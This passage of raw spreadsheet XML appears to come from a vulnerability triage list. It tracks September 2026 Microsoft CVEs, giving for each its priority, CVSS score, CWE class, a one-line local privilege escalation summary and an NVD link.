DCOM Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t></is></c></row><row r="489"><c r="A489" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C489" s="5" t="inlineStr"><is><t>CVE-2026-69289</t></is></c><c r="D489" s="5" t="n"><v>7.8</v></c><c r="E489" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G489" s="5" t="inlineStr" /><c r="H489" s="5" t="n"><v>0.004</v></c><c r="I489" s="5" t="inlineStr" /><c r="J489" s="5" t="inlineStr" /><c r="K489" s="5" t="inlineStr" /><c r="L489" s="5" t="inlineStr" /><c r="M489" s="5" t="inlineStr" /><c r="N489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P489" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q489" s="5" t="inlineStr" /><c r="R489" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S489" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t></is></c></row><row r="490"><c r="A490" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C490" s="5" t="inlineStr"><is><t>CVE-2026-69290</t></is></c><c r="D490" s="5" t="n"><v>7.8</v></c><c r="E490" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G490" s="5" t="inlineStr" /><c r="H490" s="5" t="n"><v>0.002</v></c><c r="I490" s="5" t="inlineStr" /><c r="J490" s="5" t="inlineStr" /><c r="K490" s="5" t="inlineStr" /><c r="L490" s="5" t="inlineStr" /><c r="M490" s="5" t="inlineStr" /><c r="N490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P490" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q490" s="5" t="inlineStr" /><c r="R490" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S490" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t></is></c></row><row r="491"><c r="A491" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C491" s="5" t="inlineStr"><is><t>CVE-2026-69293</t></is></c><c r="D491" s="5" t="n"><v>7.8</v></c><c r="E491" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G491" s="5" t="inlineStr" /><c r="H491" s="5" t="n"><v>0.002</v></c><c r="I491" s="5" t="inlineStr" /><c r="J491" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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91" s="5" t="inlineStr" /><c r="M491" s="5" t="inlineStr" /><c r="N491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q491" s="5" t="inlineStr" /><c r="R491" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S491" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t></is></c></row><row r="492"><c r="A492" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C492" s="5" t="inlineStr"><is><t>CVE-2026-69295</t></is></c><c r="D492" s="5" t="n"><v>7.8</v></c><c r="E492" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G492" s="5" t="inlineStr" /><c r="H492" s="5" t="n"><v>0.003</v></c><c r="I492" s="5" t="inlineStr" /><c r="J492" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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2" s="5" t="inlineStr" /><c r="M492" s="5" t="inlineStr" /><c r="N492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P492" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q492" s="5" t="inlineStr" /><c r="R492" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t></is></c></row><row r="493"><c r="A493" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C493" s="5" t="inlineStr"><is><t>CVE-2026-69298</t></is></c><c r="D493" s="5" t="n"><v>7.8</v></c><c r="E493" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G493" s="5" t="inlineStr" /><c r="H493" s="5" t="n"><v>0.003</v></c><c r="I493" s="5" t="inlineStr" /><c r="J493" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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93" s="5" t="inlineStr" /><c r="M493" s="5" t="inlineStr" /><c r="N493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P493" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q493" s="5" t="inlineStr" /><c r="R493" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S493" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t></is></c></row><row r="494"><c r="A494" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C494" s="5" t="inlineStr"><is><t>CVE-2026-69307</t></is></c><c r="D494" s="5" t="n"><v>7.8</v></c><c r="E494" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G494" s="5" t="inlineStr" /><c r="H494" s="5" t="n"><v>0.003</v></c><c r="I494" s="5" t="inlineStr" /><c r="J494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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4" s="5" t="inlineStr" /><c r="M494" s="5" t="inlineStr" /><c r="N494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q494" s="5" t="inlineStr" /><c r="R494" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S494" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t></is></c></row><row r="495"><c r="A495" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C495" s="5" t="inlineStr"><is><t>CVE-2026-69312</t></is></c><c r="D495" s="5" t="n"><v>7.8</v></c><c r="E495" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G495" s="5" t="inlineStr" /><c r="H495" s="5" t="n"><v>0.003</v></c><c r="I495" s="5" t="inlineStr" /><c r="J495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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5" s="5" t="inlineStr" /><c r="M495" s="5" t="inlineStr" /><c r="N495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P495" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q495" s="5" t="inlineStr" /><c r="R495" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S495" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t></is></c></row><row r="496"><c r="A496" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C496" s="5" t="inlineStr"><is><t>CVE-2026-69323</t></is></c><c r="D496" s="5" t="n"><v>7.8</v></c><c r="E496" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G496" s="5" t="inlineStr" /><c r="H496" s="5" t="n"><v>0.003</v></c><c r="I496" s="5" t="inlineStr" /><c r="J496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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96" s="5" t="inlineStr" /><c r="M496" s="5" t="inlineStr" /><c r="N496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P496" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q496" s="5" t="inlineStr" /><c r="R496" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S496" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t></is></c></row><row r="497"><c r="A497" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C497" s="5" t="inlineStr"><is><t>CVE-2026-69324</t></is></c><c r="D497" s="5" t="n"><v>7.8</v></c><c r="E497" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G497" s="5" t="inlineStr" /><c r="H497" s="5" t="n"><v>0.003</v></c><c r="I497" s="5" t="inlineStr" /><c r="J497" s="5" t="inlineStr" /><c r="K497" s="5" t="inlineStr" /><c r="L497" s="5" t="inlineStr" /><c r="M497" s="5" t="inlineStr" /><c r="N497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P497" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q497" s="5" t="inlineStr" /><c r="R497" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S497" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t></is></c></row><row r="498"><c r="A498" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C498" s="5" t="inlineStr"><is><t>CVE-2026-69328</t></is></c><c r="D498" s="5" t="n"><v>7.8</v></c><c r="E498" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G498" s="5" t="inlineStr" /><c r="H498" s="5" t="n"><v>0.003</v></c><c r="I498" s="5" t="inlineStr" /><c r="J498" s="5" t="inlineStr" /><c r="K498" s="5" t="inlineStr" /><c r="L498" s="5" t="inlineStr" /><c r="M498" s="5" t="inlineStr" /><c r="N498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P498" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q498" s="5" t="inlineStr" /><c r="R498" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S498" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t></is></c></row><row r="499"><c r="A499" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C499" s="5" t="inlineStr"><is><t>CVE-2026-69348</t></is></c><c r="D499" s="5" t="n"><v>7.8</v></c><c r="E499" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G499" s="5" t="inlineStr" /><c r="H499" s="5" t="n"><v>0.003</v></c><c r="I499" s="5" t="inlineStr" /><c r="J499" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K499" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L499" s="5" t="inlineStr" /><c r="M499" s="5" t="inlineStr" /><c r="N499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P499" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q499" s="5" t="inlineStr" /><c r="R499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t></is></c></row><row r="500"><c r="A500" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C500" s="5" t="inlineStr"><is><t>CVE-2026-69352</t></is></c><c r="D500" s="5" t="n"><v>7.8</v></c><c r="E500" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G500" s="5" t="inlineStr" /><c r="H500" s="5" t="n"><v>0.003</v></c><c r="I500" s="5" t="inlineStr" /><c r="J500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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00" s="5" t="inlineStr" /><c r="M500" s="5" t="inlineStr" /><c r="N500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P500" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q500" s="5" t="inlineStr" /><c r="R500" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t></is></c></row><row r="501"><c r="A501" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C501" s="5" t="inlineStr"><is><t>CVE-2026-69359</t></is></c><c r="D501" s="5" t="n"><v>7.8</v></c><c r="E501" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G501" s="5" t="inlineStr" /><c r="H501" s="5" t="n"><v>0.003</v></c><c r="I501" s="5" t="inlineStr" /><c r="J501" s="5" t="inlineStr" /><c r="K501" s="5" t="inlineStr" /><c r="L501" s="5" t="inlineStr" /><c r="M501" s="5" t="inlineStr" /><c r="N501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P501" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q501" s="5" t="inlineStr" /><c r="R501" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S501" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t></is></c></row><row r="502"><c r="A502" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C502" s="5" t="inlineStr"><is><t>CVE-2026-69368</t></is></c><c r="D502" s="5" t="n"><v>7.8</v></c><c r="E502" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G502" s="5" t="inlineStr" /><c r="H502" s="5" t="n"><v>0.002</v></c><c r="I502" s="5" t="inlineStr" /><c r="J502" s="5" t="inlineStr" /><c r="K502" s="5" t="inlineStr" /><c r="L502" s="5" t="inlineStr" /><c r="M502" s="5" t="inlineStr" /><c r="N502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P502" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q502" s="5" t="inlineStr" /><c r="R502" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S502" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t></is></c></row><row r="503"><c r="A503" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C503" s="5" t="inlineStr"><is><t>CVE-2026-69377</t></is></c><c r="D503" s="5" t="n"><v>7.8</v></c><c r="E503" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G503" s="5" t="inlineStr" /><c r="H503" s="5" t="n"><v>0.003</v></c><c r="I503" s="5" t="inlineStr" /><c r="J503" s="5" t="inlineStr" /><c r="K503" s="5" t="inlineStr" /><c r="L503" s="5" t="inlineStr" /><c r="M503" s="5" t="inlineStr" /><c r="N503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P503" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q503" s="5" t="inlineStr" /><c r="R503" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S503" s="5" t="inlineStr"><is><t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t></is></c></row><row r="504"><c r="A504" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C504" s="5" t="inlineStr"><is><t>CVE-2026-69389</t></is></c><c r="D504" s="5" t="n"><v>7.8</v></c><c r="E504" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F504" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G504" s="5" t="inlineStr" /><c r="H504" s="5" t="n"><v>0.003</v></c><c r="I504" s="5" t="inlineStr" /><c r="J504" s="5" t="inlineStr" /><c r="K504" s="5" t="inlineStr" /><c r="L504" s="5" t="inlineStr" /><c r="M504" s="5" t="inlineStr" /><c r="N504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P504" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q504" s="5" t="inlineStr" /><c r="R504" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S504" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t></is></c></row><row r="505"><c r="A505" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C505" s="5" t="inlineStr"><is><t>CVE-2026-69391</t></is></c><c r="D505" s="5" t="n"><v>7.8</v></c><c r="E505" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G505" s="5" t="inlineStr" /><c r="H505" s="5" t="n"><v>0.003</v></c><c r="I505" s="5" t="inlineStr" /><c r="J505" s="5" t="inlineStr" /><c r="K505" s="5" t="inlineStr" /><c r="L505" s="5" t="inlineStr" /><c r="M505" s="5" t="inlineStr" /><c r="N505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P505" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q505" s="5" t="inlineStr" /><c r="R505" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S505" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t></is></c></row><row r="506"><c r="A506" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C506" s="5" t="inlineStr"><is><t>CVE-2026-69392</t></is></c><c r="D506" s="5" t="n"><v>7.8</v></c><c r="E506" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G506" s="5" t="inlineStr" /><c r="H506" s="5" t="n"><v>0.003</v></c><c r="I506" s="5" t="inlineStr" /><c r="J506" s="5" t="inlineStr" /><c r="K506" s="5" t="inlineStr" /><c r="L506" s="5" t="inlineStr" /><c r="M506" s="5" t="inlineStr" /><c r="N506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q506" s="5" t="inlineStr" /><c r="R506" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S506" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t></is></c></row><row r="507"><c r="A507" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C507" s="5" t="inlineStr"><is><t>CVE-2026-69407</t></is></c><c r="D507" s="5" t="n"><v>7.8</v></c><c r="E507" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F507" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G507" s="5" t="inlineStr" /><c r="H507" s="5" t="n"><v>0.003</v></c><c r="I507" s="5" t="inlineStr" /><c r="J507" s="5" t="inlineStr" /><c r="K507" s="5" t="inlineStr" /><c r="L507" s="5" t="inlineStr" /><c r="M507" s="5" t="inlineStr" /><c r="N507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P507" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q507" s="5" t="inlineStr" /><c r="R507" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S507" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t></is></c></row><row r="508"><c r="A508" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C508" s="5" t="inlineStr"><is><t>CVE-2026-69420</t></is></c><c r="D508" s="5" t="n"><v>7.8</v></c><c r="E508" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F508" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G508" s="5" t="inlineStr" /><c r="H508" s="5" t="n"><v>0.003</v></c><c r="I508" s="5" t="inlineStr" /><c r="J508" s="5" t="inlineStr" /><c r="K508" s="5" t="inlineStr" /><c r="L508" s="5" t="inlineStr" /><c r="M508" s="5" t="inlineStr" /><c r="N508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q508" s="5" t="inlineStr" /><c r="R508" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S508" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t></is></c></row><row r="509"><c r="A509" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C509" s="5" t="inlineStr"><is><t>CVE-2026-69421</t></is></c><c r="D509" s="5" t="n"><v>7.8</v></c><c r="E509" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F509" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G509" s="5" t="inlineStr" /><c r="H509" s="5" t="n"><v>0.003</v></c><c r="I509" s="5" t="inlineStr" /><c r="J509" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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09" s="5" t="inlineStr" /><c r="M509" s="5" t="inlineStr" /><c r="N509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q509" s="5" t="inlineStr" /><c r="R509" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S509" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t></is></c></row><row r="510"><c r="A510" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C510" s="5" t="inlineStr"><is><t>CVE-2026-69424</t></is></c><c r="D510" s="5" t="n"><v>7.8</v></c><c r="E510" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G510" s="5" t="inlineStr" /><c r="H510" s="5" t="n"><v>0.003</v></c><c r="I510" s="5" t="inlineStr" /><c r="J510" s="5" t="inlineStr" /><c r="K510" s="5" t="inlineStr" /><c r="L510" s="5" t="inlineStr" /><c r="M510" s="5" t="inlineStr" /><c r="N510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P510" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q510" s="5" t="inlineStr" /><c r="R510" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S510" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t></is></c></row><row r="511"><c r="A511" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C511" s="5" t="inlineStr"><is><t>CVE-2026-69426</t></is></c><c r="D511" s="5" t="n"><v>7.8</v></c><c r="E511" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F511" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G511" s="5" t="inlineStr" /><c r="H511" s="5" t="n"><v>0.003</v></c><c r="I511" s="5" t="inlineStr" /><c r="J511" s="5" t="inlineStr" /><c r="K511" s="5" t="inlineStr" /><c r="L511" s="5" t="inlineStr" /><c r="M511" s="5" t="inlineStr" /><c r="N511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P511" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q511" s="5" t="inlineStr" /><c r="R511" s="5" 